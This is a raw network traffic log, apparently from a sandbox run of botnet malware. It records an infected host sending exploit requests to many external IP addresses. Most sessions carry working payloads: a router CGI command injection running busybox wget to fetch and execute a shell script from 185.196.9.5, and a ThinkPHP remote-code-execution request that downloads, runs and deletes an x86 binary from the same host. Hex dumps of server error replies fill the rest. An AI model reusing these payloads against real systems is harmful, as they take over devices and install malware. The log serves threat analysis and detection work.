79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff

Session ID	Source IP	Source Port	Destination IP	Destination Port
350	192.168.2.15	46630	94.122.234.146	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:22.120609999 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
351	192.168.2.15	50836	95.48.246.132	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:22.128556013 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:22.361852884 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:03:10 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
352	192.168.2.15	59064	95.217.250.44	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:22.735436916 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:22.932261944 CET	506	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:22 GMT Server: Apache/2.4.38 (Debian) Content-Length: 312 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 76 73 30 34 34 2d 68 32 33 37 2e 64 6e 77 2d 72 7a 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at vs044-h237.dnw-rz.de Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
353	192.168.2.15	49084	95.251.254.209	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:22.735789061 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
354	192.168.2.15	35496	95.0.243.228	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:22.761540890 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:31.005709887 CET	51	IN	HTTP/1.1 504 Gateway Timeout Connection: close
Feb 25, 2024 19:03:31.209876060 CET	51	IN	HTTP/1.1 504 Gateway Timeout Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
355	192.168.2.15	54508	95.183.196.167	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:22.784348011 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
356	192.168.2.15	59054	95.101.232.57	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:22.821230888 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:23.109930992 CET	140	IN	HTTP/1.1 400 Bad Request Content-Length: 79 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>
Feb 25, 2024 19:03:23.163580894 CET	140	IN	HTTP/1.1 400 Bad Request Content-Length: 79 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>
Feb 25, 2024 19:03:23.260318995 CET	140	IN	HTTP/1.1 400 Bad Request Content-Length: 79 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
357	192.168.2.15	55914	94.253.17.96	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:23.130913973 CET	140	IN	HTTP/1.1 403 Forbidden Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close Cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
358	192.168.2.15	38396	112.175.14.4	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:23.219912052 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:23.510524988 CET	666	IN	HTTP/1.1 404 Not Found Date: Sun, 25 Feb 2024 18:03:22 GMT Server: Microsoft-IIS/5.0 Content-Length: 499 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0d 0a 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6b 72 22 20 2f 3e 0d 0a 09 3c 74 69 74 6c 65 3e 5b 34 30 34 5d 20 4e 6f 74 20 46 6f 75 6e 64 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 66 72 61 6d 65 73 65 74 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 6e 6f 22 20 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 20 63 6f 6c 73 3d 22 2a 22 3e 0d 0a 09 3c 66 72 61 6d 65 20 6e 61 6d 65 3d 22 6d 61 69 6e 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 65 73 6f 6c 75 74 69 6f 6e 2e 63 6f 6d 2f 68 74 74 70 65 72 72 6f 72 2f 6c 69 6e 75 78 2f 34 30 34 2e 68 74 6d 6c 22 20 6e 6f 72 65 73 69 7a 65 3d 22 6e 6f 72 65 73 69 7a 65 22 3e 3c 2f 66 72 61 6d 65 3e 0d 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=euc-kr" /><title>[404] Not Found Error</title></head><frameset frameborder="no" border="0" scrolling="no" cols="*"><frame name="main" src="http://www.nesolution.com/httperror/linux/404.html" noresize="noresize"></frame></frameset></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
359	192.168.2.15	48814	112.126.71.222	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:23.237226009 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:23.544933081 CET	442	IN	HTTP/1.1 404 Not Found Date: Sun, 25 Feb 2024 18:03:23 GMT Server: Apache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 181 Keep-Alive: timeout=15, max=300 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 4b 0f 82 30 10 84 ef fc 8a 95 bb 2c 1a 8e 4d 0f f2 88 24 88 c4 94 83 47 4c d7 94 04 69 a5 c5 c7 bf 97 c7 c5 e3 ec cc 37 b3 6c 93 9c 63 71 ad 52 38 8a 53 01 55 7d 28 f2 18 fc 2d 62 9e 8a 0c 31 11 c9 ea ec 83 10 31 2d 7d ee 31 e5 1e 1d 67 8a 1a 39 09 d7 ba 8e 78 14 46 50 6a 07 99 1e 7b c9 70 3d 7a 0c 97 10 bb 69 f9 9d b9 1d ff cb 4c ca 63 86 0b 45 30 d0 73 24 eb 48 42 7d 29 00 db 5e d2 27 30 ca c0 bb b1 d0 4f c8 7d 46 40 f7 e0 54 6b c1 d2 f0 a2 21 60 68 e6 89 a5 7c aa 9b 9f f2 7e 74 46 9f df cf 00 00 00 Data Ascii: MK0,M$GLi7lcqR8SU}(-b11-}1g9xFPj{p=ziLcE0s$HB})^'0O}F@Tk!`h\|~tF

Session ID	Source IP	Source Port	Destination IP	Destination Port
360	192.168.2.15	39684	95.86.99.167	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:23.672348976 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
361	192.168.2.15	37408	85.145.198.175	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:23.866141081 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:24.178805113 CET	256	IN	HTTP/1.1 401 Unauthorized Content-Type: application/json Content-Length: 48 Date: Sun, 25 Feb 2024 18:03:24 GMT X-Frame-Options: sameorigin Content-Security-Policy: frame-ancestors 'self' Data Raw: 7b 0a 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 49 6e 76 61 6c 69 64 20 55 73 65 72 6e 61 6d 65 20 6f 72 20 50 61 73 73 77 6f 72 64 22 0a 20 7d Data Ascii: { "result": "Invalid Username or Password" }

Session ID	Source IP	Source Port	Destination IP	Destination Port
362	192.168.2.15	43538	85.208.120.105	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:23.897938967 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:24.121867895 CET	1286	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.23 Mime-Version: 1.0 Date: Sun, 25 Feb 2024 17:33:41 GMT Content-Type: text/html Content-Length: 3167 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff

Session ID	Source IP	Source Port	Destination IP	Destination Port
363	192.168.2.15	33340	31.200.49.205	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:23.901038885 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
364	192.168.2.15	58946	94.121.54.207	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:23.901067019 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
365	192.168.2.15	51476	94.120.52.103	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:24.120881081 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
366	192.168.2.15	59388	62.29.33.27	8080

Timestamp	Bytes transferred	Direction	Data
